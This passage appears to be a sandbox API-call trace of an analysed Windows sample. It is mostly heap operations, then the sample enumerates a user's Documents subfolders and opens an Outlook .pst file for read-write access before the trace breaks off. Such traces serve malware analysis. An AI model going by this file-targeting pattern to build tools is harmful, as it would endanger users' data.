[0196.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0196.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0196.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0196.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0196.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0196.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0196.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0196.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0196.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0196.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0196.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0196.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0196.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.737] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Music\\") returned="My Music\\" [0196.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0196.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea19b0 [0196.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.737] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0196.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea19b0 | out: hHeap=0x620000) returned 1 [0196.737] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.738] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.738] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.738] PathFindFileNameW (pszPath="") returned="" [0196.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.738] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Music\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my music\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b2a0b0, ftCreationTime.dwHighDateTime=0x1d89bdf, ftLastAccessTime.dwLowDateTime=0x5545ada0, ftLastAccessTime.dwHighDateTime=0x1d89cf5, ftLastWriteTime.dwLowDateTime=0x5545ada0, ftLastWriteTime.dwHighDateTime=0x1d89cf5, nFileSizeHigh=0x0, nFileSizeLow=0xeaef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z99M8Y1GRoOyuotMz.csv", cAlternateFileName="Z99M8Y~1.CSV")) returned 0xffffffff [0196.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0196.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0196.740] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0196.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.740] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0196.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0196.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0196.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0196.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0196.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0196.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0196.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0196.742] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\") returned="My Pictures\\" [0196.742] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0196.742] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.742] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.742] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.742] PathFindFileNameW (pszPath="") returned="" [0196.742] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my pictures\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b2a0b0, ftCreationTime.dwHighDateTime=0x1d89bdf, ftLastAccessTime.dwLowDateTime=0x5545ada0, ftLastAccessTime.dwHighDateTime=0x1d89cf5, ftLastWriteTime.dwLowDateTime=0x5545ada0, ftLastWriteTime.dwHighDateTime=0x1d89cf5, nFileSizeHigh=0x0, nFileSizeLow=0xeaef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z99M8Y1GRoOyuotMz.csv", cAlternateFileName="Z99M8Y~1.CSV")) returned 0xffffffff [0196.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0196.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0196.743] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0196.743] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0196.743] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\") returned="My Videos\\" [0196.743] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0196.743] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.743] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.743] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.743] PathFindFileNameW (pszPath="") returned="" [0196.744] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my videos\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b2a0b0, ftCreationTime.dwHighDateTime=0x1d89bdf, ftLastAccessTime.dwLowDateTime=0x5545ada0, ftLastAccessTime.dwHighDateTime=0x1d89cf5, ftLastWriteTime.dwLowDateTime=0x5545ada0, ftLastWriteTime.dwHighDateTime=0x1d89cf5, nFileSizeHigh=0x0, nFileSizeLow=0xeaef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z99M8Y1GRoOyuotMz.csv", cAlternateFileName="Z99M8Y~1.CSV")) returned 0xffffffff [0196.745] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0196.745] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0196.745] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0196.745] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0196.745] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.745] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.745] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.745] PathFindFileNameW (pszPath="") returned="" [0196.745] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0196.745] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.745] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 1 [0196.745] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst") returned=".pst" [0196.745] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.746] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=271360) returned 1 [0196.746] VirtualAlloc (lpAddress=0x0, 